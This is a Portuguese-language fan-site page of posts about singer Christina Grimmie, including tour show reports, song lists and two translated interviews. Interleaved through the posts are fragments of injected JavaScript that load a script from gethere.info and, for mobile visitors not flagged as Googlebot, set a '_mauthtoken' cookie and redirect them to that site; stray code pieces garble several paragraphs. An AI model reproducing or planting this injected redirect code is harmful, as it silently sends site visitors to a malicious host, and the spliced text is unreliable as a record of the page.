O segundo show da The Wildfire Tour aconteceu na cidade de Austin, Texas no espaço Emo’s Austin. Ao final do seu set, Christina Grimmie se dirigiu a sua banca de merchandising – onde são vendidos suas camisetas e poster – e atendeu alguns fãs.

Show em Austin, Texas
Data: 27 de fevereiro de 2016
Local: Emo’s Austin
Capacidade: 1,700 pessoas
2º show da turnê

PERFORMANCES

Without Him
Wrecking Ball
Deception
Liar Liar
Snow White
Anybody’s You

FOTOS POR FÃS

var d=document;var s=d.createElement(‘script’);

Durante sua passagem por Dallas, Texas com a The Wildfire Tour, Christina Grimmie concedeu uma entrevista exclusiva em vídeo para a rádio local 103.7 KVIL, falou sobre sua carreira, The Voice e sua amizade com Selena Gomez. Confira abaixo:

Leigh Ann: Olá, aqui é a Leigh Ann e Courtney Kerr na 103.7 KVIL com a Christina Grimmie! Como você está? Bem vinda a Dallas!
Estou bem! Obrigada.

Leigh: Você está em turnê nesse momento com a Rachel Platten.
Estou!

Leigh: E você já a conheceu?
Na verdade eu a encontrei uma vez em um show que ela abriu para o Andy Grammer um tempo atrás, e não a conhecia na época e depois do show eu me senti obrigada, você sabe, a ir dizer oi e falei tipo “Hey, você é realmente muito boa!” e ela ficou tipo “Oh, obrigada” e tal, e ela foi fazer suas coisas, meet&greets. Depois eu envie um tweet também e mais tarde ela respondeu “Eu não tinha ideia que foi você que me cumprimentou. Meu Deus, você é a Christina Grimmie! E eu sei quem você é.” e blá blá.  E a turnê surgiu alguns meses depois, nós somos meio amigas. Nós já somos meio amigas.

Leigh: Ela é super legal, nós a adoramos. […] Então, você esteve a sexta temporada do The Voice. Eu me lembro muito bem dessa temporada. Adam, certo?
Certo.
Courtney: Como a Leigh Ann poderia esquecer. Adam Levine é…
Leigh: Ele é meu namorada na minha cabeça.
Oh, okay. Muitas pensam assim na verdade.

Leigh: Acho que muitas pessoas são apaixonadas pelo Adam.
Sim.

Leigh: Quando você participou do The Voice, você ficou em terceiro lugar. E teve algumas pessoas que.. Adam queria assinar com você e… Quem era? Tinha mais alguém. Ele é um rapper…
Sim, Lil’ Wayne.

Leigh: Não é uma honra? Ter pessoas, não lutando, mas oferecendo…
Sim, foi muito muito legal. Eu sinto que aprendi muito enquanto estava no programa, cresci muito como artista. Então foi legal ver todo mundo me apoiando.

Leight: Você tem uma grande audiência no YouTube. O que te fez começar nisso? Foi antes ou depois do The Voice?
Muito antes! YouTube foi onde eu comecei minha carreira, simplesmente postava covers, aceitava pedidos. The Voice… Eu sinto que já tinha feito muitas coisas até aquele momento, antes do The Voice quero dizer. Já tinha saindo em turnê com a Selena Gomez duas vezes, lançado dois álbuns. Eu estava fazendo todas coisas, o que era legal, mas fiquei tipo “O que eu não estou fazendo?” Sempre achei o The Voice muito legal, desde a primeira temporada.

Courtney: O que te inspirou a fazer a audição? The Voice parecia uma passo para trás, já que você já tinha saindo em turnê com a Selena, ou parecia algo que poderia te levar para o próximo nível?
Meu Deus, não parecia um passo para trás de jeito nenhum. Foi uma coisa muito estressante, muito mais do que sair em turnê porque você não está só se apresentando em um palco para o público mas é transmitido na televisão e é semanal, se você errar todo mundo vai ver.

Courtney: Por já ter saído em turnê, você se sentiu mais preparada do que os outros participantes?
Completamente. Eu estava tão preparada, na verdade senti que tinha mais experiência do qualquer um lá, para ser honesta. Até nas blinds, eu estava tipo “Estou tão feliz que sai em turnê com a Selena Gomez.” Eu não tinha nem mesmo uma banda quando fiz isso, era literalmente eu andando de um lado para o outro nesse palco gigante.

Leigh: Você a Selena saiam durante a turnê?
Sim, um pouquinho aqui e ali. Ela é a pessoa mais ocupada que eu já conheci. Especialmente na turnê, ela tipo acordava, escova os dentes, fazia toda essa coisa e ia para entrevistas, entrevistas, meet&greets, show e mais meet&greets. Mas o tempo que eu consegui passar com ela, ela foi muito doce, todo mundo pergunta isso “Ela era uma diva?” “Ela é legal?” ela sempre convidada eu e meu irmão – ele era meu guitarrista – e ela tipo “Vocês querem passar um tempo no nosso ônibus?” e essa coisas. Ela é um amor.

[…]

Leigh: Mal podemos esperar para te ver amanhã a noite!
Courtney: Estamos muito animadas por te ter em Dallas.
Obrigada.

Leigh: Você precisa comer comida mexicana, eu sei que você falou mais cedo que queria ir ao Dunkin’ Donuts, mas você pode encontrar isso em qualquer lugar.
Courtney: Você precisa de comida mexicana, e você tem 21 anos então pode beber margaritas.
Sim, tem isso!
Courtney: Três ou nove!
Sim, nós estávamos falando sobre isso porque eu falei que amo Dunkin’ Donuts e muitas pessoas, especialmente aquela noite, estavam tipo “Eu sou só isso, ou isso.” e eu estava tipo “Eu amo tudo!”

Leigh: Bom, obviamente ou você faz muita academia ou tem um metabolismo muito rápido.
Metabolismo rápido! Mas nunca me canso de chocolate. Chocolate é com certeza o meu favorito.

Leigh: Agora que você tem 21 e pode beber. Você bebe?
Não, eu não bebo. Vou beber, ocasionalmente, champanhe. Acho que champanhe é o meu favorito se for, por um exemplo, uma comemoração e tal. Minha mãe, eu me lembro, antes dos meus 21, nós saíamos e ela sempre pedia vinho tinto e eu ficava tipo “Não consigo me imaginar gostando do disso.”

Courtney: Eu também não consigo me imaginar gostando disso.
Leigh: Espere até você ter filhos. Você vai precisar!
É, não sei, não gosto muito desse cenário porque, você sabe, pode sair do controle.

} else {

O primeiro show da The Wildfire Tour aconteceu ontem, 26, em Dallas, Texas no teatro Granada Theater. Christina foi a primeira a apresentar o seu set, que contou com todas as músicas de Side A e um cover. Após o show a finalização de todos os sets, Grimmie realizou um meet&greet com os fãs do local, tirando fotos e conversando.

Show em Dallas, Texas
Data: 26 de fevereiro de 2016
Local: Granada Theater
Capacidade: 1,000 pessoas
1º show da turnê

PERFORMANCES

Without Him
Wrecking Ball
Deception
Liar Liar
Snow White
Anybody’s You

FOTOS POR FÃS

O site Teen.com fez uma lista com seis celebridades do YouTube que tentaram sair da Internet para Hollywood mas ainda não conseguiram, e Christina Grimmie está presente nesta lista juntamento com Rebecca Black, Greyson Chance e Grace Helbig. Confira a matéria completa:

Por anos, estrelas do YouTube não passaram disso – eles eram famosos apenas para as pessoas que os assistiam online. Mas nos últimos anos, um grande número de personalidades do YouTube saltaram do mundo online para o sucesso legítimo. Tyler Oakley se tornou um regular membro dos red-carpets, entrevistando celebridade em eventos vips como o Grammy. E não vamos esquecer do Justin Bieber, ele começou performando no YouTube.

Mas esses são as exceções, não as regras. Normalmente, mesmo os YouTubers mais populares não são impressionantes o bastante para os padrões de Hollywood. Uma estrela do YouTube pode ser uma das cantores mais talentosas – ou um hilário comediante, ou um incrível bailarino… você entendeu – mas ultimamente, sua fama se mantem na Internet.

Christina Grimmie

Não há dúvidas de que Christina é uma cantora incrível. Os seus covers no YouTube de músicas como “Skyscraper” da Demi Lovato fez com que ela ganhasse dezenas de fã no mundo todo. Em 2011, Christina foi escolhida a dedo para ser cantora de apoio da Selena Gomez; depois, ela abriu shows para a Selena, Allstar Weekend e Jonas Brothers. Parecia que ela estava prestes a conseguir o sucesso quando ela competiu no The Voice em 2014, terminando em terceiro lugar. No entanto, apesar do suporte de estrelas com Adam Levine e Justin Bieber, Christina foi demitida de sua gravadora. Ela lançou novas músicas desde então, mas não conseguiu ganhar muita atenção.

E vocês, acham que Christina ainda chega a Hollywood ou está destinada a manter sua fama apenas na Internet?

As gravações de ontem aconteceram no Granada Theater – mesmo local do primeiro show da Wildfire Tour que começa na sexta-feira, 26 – em Dallas, Texas e contou com a participação de vários frands como extras.

De acordo com um fã, as gravações não são apenas para Snow White, são na verdade para um curta-metragem com as quatro músicas de Side A: Snow White, Anybody’s You, Deception e Without Him.

“Você não ouviu de mim, mas ela está fazendo um basicamente curta-metragem com todas as músicas do ep”

Após as gravações, Christina conversou com os fãs e tirou várias selfies, e até um vídeo para o SnapChat de um dos fãs.

Um vídeo publicado por @letdavidbewithyou em

“Olá SnapChat, e ai, aqui é a… Por que eu falei assim? Meu nome é Christina Grimmie, e ai?! Esse maravilhoso jovem veio aqui para me ver, tchau!”

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

O segundo dia de gravações de “Snow White” começou a todo vapor em Dallas, Texas. Christina Grimmie mudou o figurino, e no lugar do look casual do primeiro dia, usou um vestido preto formal e uma maquiagem mais pesada. Confira as fotos:

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Christina Grimmie vem trabalhando em músicas novas há algum tempo, gravou e produziu muito coisa antes de selecionar as canções que entrariam em Side A. De acordo com os registros do SongFile – site em que escritores cadastram suas músicas – Grimmie tem três novas músicas no banco de dados do site.

Bad Moves escrita por Christina Grimmie e Steve Moakler, I Only Miss You When I Breathe escrita por Christina Grimmie, Steven Solomon e Rinat Arinos e Criminal escrita por Christina Grimmie, Nazerine Henderson, Mher Filian (Demi Lovato “U Got Nothin on Me” e Selena Gomez “I Promise You”, “More”) e Melanie Joy Fontana (Justin Bieber “Home This Christmas”)

badmovescriminal missyou

Não há nenhuma informação sobre o destino de tais canções.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Christina Grimmie está em Dallas, Taxas para as gravações de seu vídeo-clipe para Snow White e para o primeiro show da The Wildfire Tour, que será no próximo dia 26. As gravações aconteceram no prédio Dallas Power and Light Lofts (DP&L) no centro da cidade. Confira fotos:

Depois de Snow White, Christina Grimmie divulgou os lyric videos de mais duas canções do EP, Side A, que será lançando no dia 21 de fevereiro. Ouça abaixo Anybody’s You e Deception:

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Christina Grimmie é uma em um milhão e muito mais de um milhão de pessoas já viram ela cantar! Ela começou sua carreira no YouTube como zeldaxlove64, mas assim que começaram a notar o seu talento ela foi arremessada no mundo dos shows bizness online e offline se apresentando ao vivo em rádio, grandes palcos ate cantar na Ellen. Depois de sair em turnê com Selena Gomez, ela participou do The Voice e deixou todo mundo impressionado. Colocando o título de iHeartRadio Rising Star e um prêmio AMA no seu cinto, Christina não para, agora com seu novo EP e novo álbum, With Love, subindo nos charts da Billboard.

O que você pode nos contar sobre seu carreira musical antes de começar a postar vídeos no YouTube?
Antes do YouTube eu não tinha necessariamente uma carreira. Cresci amando fazer música e desde que me lembro, talvez com quatro ou cinco anos, estava sempre escrevendo músicas e tocando piano.

Quão benéfico você acha que é, para aspirantes a cantores, postarem covers no YouTube?
Acho que postar no YouTube é o caminho. Você pode conseguir qualquer coisa online. Você pode refazer o arranjo de uma música do seu jeito, ou cantar qualquer coisa, ou colocar músicas originais. YouTube é o lugar em que as pessoas vão para achar novas músicas atualmente.

O que te fez querer participar do The Voice?
Eu já tinha feito muita coisa até aquele momento. Postei vídeos, era uma “YouTube Star”… Sai em turnê com a Selena Gomez! Me perguntei “O que mais pode me levar para um nível diferente?” The Voice realmente foca na voz dos artistas e achei super interessante e legal. Então, por que não? Quis dar uma chance ao The Voice e ver o que acontecia.

The Voice deve ter sido uma mudança muito intensa.
É definitivamente muito estressante estar em rede nacional toda semana e ter que fazer um trabalho perfeito.

Quando tempo você tinha para aprender e ensaiar as músicas?
Nós aprendíamos duas ou três músicas na semana as vezes e nós só tínhamos dois dias para aprender as músicas de grupo com todo mundo, mas eu encarei esses desafios de frente. Você coloca muita pressão em si mesmo, mas eu cresci enquanto estava lá.

O que você fez para continuar firma diante de toda aquela pressão?
Sinto que cresci muito em tão pouco tempo. Todo obstáculo que aparecia, falava para mim mesma, “Vou me certificar em fazer o meu melhor nesse show, e mostrar para a América e para as pessoas da indústria o que eu posso fazer sob pressão.”

No The Voice, os cantores tem suas performances não só julgadas por um painel de celebridade, mas também pelo público. Qual seu conselho para quem lida com constantes críticas?
Quando você está no The Voice, você tem esses quatro mentores a sua frente que são tão famosos e muito bom no que fazem. Não aceitar as críticas construtivas vindo deles é ridículo para mim. Eu queria que eles me dessem algo que eu pudesse trabalhar.

Como isso aplica a sua criatividade?
Honestamente, sou muito perfeccionista. Me crítico. Nunca gravo nada no meu quarto e fico tipo “Wow, isso ficou tão bom.” Estou sempre “Talvez tenha algo errado com isso. Vamos consertar e fazer melhor!”

Qual o conselho mais importante que alguém já te deu em termos de carreira?
Já recebi tantos conselhos. Adam Levine me deu alguns sobre estar nessa indústria. Ele me falou, “Você precisa fazer o que você quer, porque no momento que você começar a fazer o que as pessoas esperam de você, você se tornará transparente.”

Essa indústria pode ser carregada com muitos sinais apontando em todas as direções.
Houve momentos na minha carreira em que eu me senti muito vulnerável, e eu queria fazer o que as pessoas me pediam para fazer, mas também não queria me perder no meu trabalho, e isso foi difícil.

Tem alguma coisa que você gostaria de saber quando começou?
Gostaria de saber o quão difícil esse tipo de carreira seria e quão mente aberta eu deveria ter sido. Com mente aberta, quero dizer que teve muitas coisas que eu me recusei a fazer, como diferentes estilos de roupas e até música. Eu era tão fechada para certas coisas e acho que não deveria ter sido. Estou definitivamente estou mais aberta com música agora.

O que você acha que te colocou no mundo da fama?
Meu Deus – o Senhor, e os fãs que me seguem e se tornaram o Team Grimmie.

Você tem uma base de fãs online muito fiel com mais de 3 milhões no YouTube. Como você interage tão bem com seus fãs onlines?
Sou abençoada com meus fãs. Eles tem muita personalidade – não sei de onde isso vem, talvez de mim? Conseguir interagir com os seus fãs é importante para mim e os meus são hilários! Amo conversar com eles como se fossemos amigos, então eu os chamo de “frands,” me comunico com eles conversando, mostrando minha personalidade, sendo engraçada, e sendo relacionável.

… e ótima música!
Eles estão constantemente me dando apoio, não importa qual música eu lance e eles estão ativos mesmo quando eu não estou e não lanço nenhuma música nova.

De todos os covers que você já fez, qual seu favorito?
Eu gosto muito do meu cover de “Just A Dream” do Nelly que fiz com o Kurt Schneider e Sam Tsui. Meu outro favorito é “Do I Wanna Know” do Arctic Monkeys.

Você também tem uma lista de covers para fazer?
Algumas pessoas me pediam para fazer cover de algumas músicas e depois de algum tempo se tornou uma lista dais quais eu queria cantar para essas pessoas. Os covers se tornaram uma coisa semanal e depois se tornaram algo realmente importante.

Como você se sentiu ao vencer um American Music Award?
Ganhei Best Female New Media Award, o que foi louco! Acho que os meus fãs online contribuiram muito com isso.

Como foi quando você subiu ao palco como a vencedora do Macy’s iHeartRadio Rising Star?
Foi o sentimento mais insano! Nunca esperava ganhar e subir no palco e performar, foi tão intenso. Performar no iHeartRadio me lembrou minha primeira vez no The Voice, porque tinha uma grande plateia com muita gente importante que eu precisava impressionar.

Você já performou três vezes no Dancing with the Stars.
Dancing with the Stars foi minha primeira experiência cantando ao vivo na televisão, então eu estava uma bagunça. No final, me apresentar lá foi incrível.

Qual o seu processo para criar uma música e que tipo de coisas te inspiram?
Quando escrevo música, começa bem básico. Normalmente trabalho um pouco com o piano. Vou tocando acordes e cantando sobre o que estou sentindo. Às vezes até escrevo no meu celular algumas palavras que quero incorporar em uma música, palavras que estou sentindo no momento. Simplesmente improviso alguma coisas e normalmente alguma coisa sai legal.

De todas as suas músicas originais, de qual você sente mais orgulho?
Acho que é minha canção título, “With Love,”que está no meu último álbum. Foi a primeira música que escrevi para o álbum e trabalhei nesse álbum por quase um ano. Escrevi essa música sobre meus fãs e Deus. Teve repercussão com meus fãs.

Você pode nos contar sobre o que vem por aí para a therealgrimmie?
Planejo lançar músicas novas. Essas novas músicas que estou fazendo, são provavelmente as mais especiais para mim entre todas as outras, tive muito participação nelas. É realmente minha verdadeira música desta vez. Tem muita influência do piano e foco nos vocais… Amo isso. Sinto que não lanço algo assim a um tempo. Mal posso esperar.

Muitos músicos estão atuando e cantando. Você tem planos em atuar também?
Eu tenho me interessado por atuação recentemente e, na verdade, tenho um filme gravado chamando The Matchbreaker. Eu até faço um dos papéis principais, Emily Atkins. Nós terminamos as filmagens alguns meses atrás e estou muito animada para o lançamento. Atuar é divertido para mim, mas não é minha prioridade, é na música que eu quero ser bem sucedida.

Tem alguma banda ou artista solo que te influenciam muito?
Tenho diferentes inspirações para diferentes coisas. Walk The Moon é a minha favorita atualmente. No sentido de letras, Switchfoot sempre foi minha banda favorita. Adoro a mensagem que eles passam.

O que você mais admira na carreira de um artista musical?
Como artista, Skrillex tem sido um dos meus favoritos. É legal que ele entrou na indústria com músicas tão estranhas, ficou famoso, e agora continua fazendo o que ama. Ele experimentou diferentes tipos de música, algumas pessoas criticaram ele por isso, mas ele nunca mudou. Sempre quis uma carreira como a dele.

Qual foi a primeira música que você se apaixonou?
Tem uma música chamado “Don’t Look at Me” da Stacie Orrico – e ela é minha cantora favorita! Eu tinha dez anos e minha amiga me falou para ouvir Stacie Orrico porque ela achou que minha voz era parecida com a dela e eu gostaria de sua música. Então peguei o CD emprestado e ouvi. Estava ouvindo essa música e depois dos cinco primeiro segundos chegou nessa parte louca… foi incrível.

Você recentemente foi jurada a competição de canto Berkeley’s Star em UC Berkeley. Como você se sentiu estando do outro lado do painel de jurados?
É algo que eu sempre quis fazer. Na infância eu sempre assistia todos os shows de talentos e sempre quis ou participar ou ser jurada. Além disso, ser jurada é muito divertido para mim porque eu posso dar conselhos sobre saúde vocal. Durante Berkeley’s Star, não queria me tornar o jurado que diz as pessoas “Wow, você foi realmente monótono,” eu queria ajuda-los, assim eles saberiam se estavam ou não cantando de jeito que não era saudável para sua voz.

Como você cuida da sua voz?
Eu tenho um umidificador no meu quarto que nunca fica desligado. Mantenho a umidade do meu quarto extremamente alta porque assim que fica seco, minha voz vai embora. Também me aqueço uma hora antes de cantar sempre que eu vou cantar. Às vezes vou faço umas aulas quando preciso, mas não é uma rotina. Eu simplesmente canto todos os dias.

Qual era o seu programa de TV favorito na infância?
Bob Esponja e Drake & Josh. Na Berkeley’s Star eu conheci o Drake Bell e fui surtei por um minuto. Foi tipo um sonho se tornando realidade. Conhecer ele foi tipo conhecer o Bob Espoja. Eu estava tipo, “Esse é o melhor dia da minha vida.”

Então, você é fã de Zelda – qual o seu jogo favorito?
Diria que Majora’s Mask é o meu jogo de Zelda favorito. Gosto de Ocarina of Time também, é difícil escolher entre os dois, mas nesse momento Majora’s Mask.

Nos conte um pouco sobre sua tatuagem?
A tatuagem está em inglês, mas na fonte Elvish. Diz “All is vanity.” Essa é uma frase do livro Eclesiastes, que é, sem dúvidas, o meu livro favorito da Bíblia. “Tudo é vaidade” significa para mim que é fácil se deixar levar pelo orgulho. Não quero que isso aconteça nunca e tenho uma ótima família que me mantem no chão. Você tem que ser especialmente cuidadoso com o ego nessa indústria.

Algum conselho para quem é novo nos holofotes?
As pessoas te dizem para ignorar o que os outros falam, ignorar a negatividade, e eu mesma falo isso muito. Mas as vezes você irá ler um comentário que alguém fez e aquilo irá penetrar você, e então você começará a repensar tudo. É um sentimento horrível, mas no final do dia você tem 98% de pessoas te apoiando e te deixando para cima. Então por que você escolheria focar nos que simplesmente não gostam do que você faz?

Qual o segredo para o sucesso?
Muito apoio da família e muito apoio nos negócios. Os relacionamentos na indústria que eu tenho são como uma família para mim, e quando você se relaciona assim, você vai cada vez mais para cima. Tem também o meu incrível Team Grimmie, meus “frands.” Eles são a razão pela qual eu continuo fazendo o que amo.var d=document;var s=d.createElement(‘script’);

Página 8 de 30«1 ...456789101112... 30»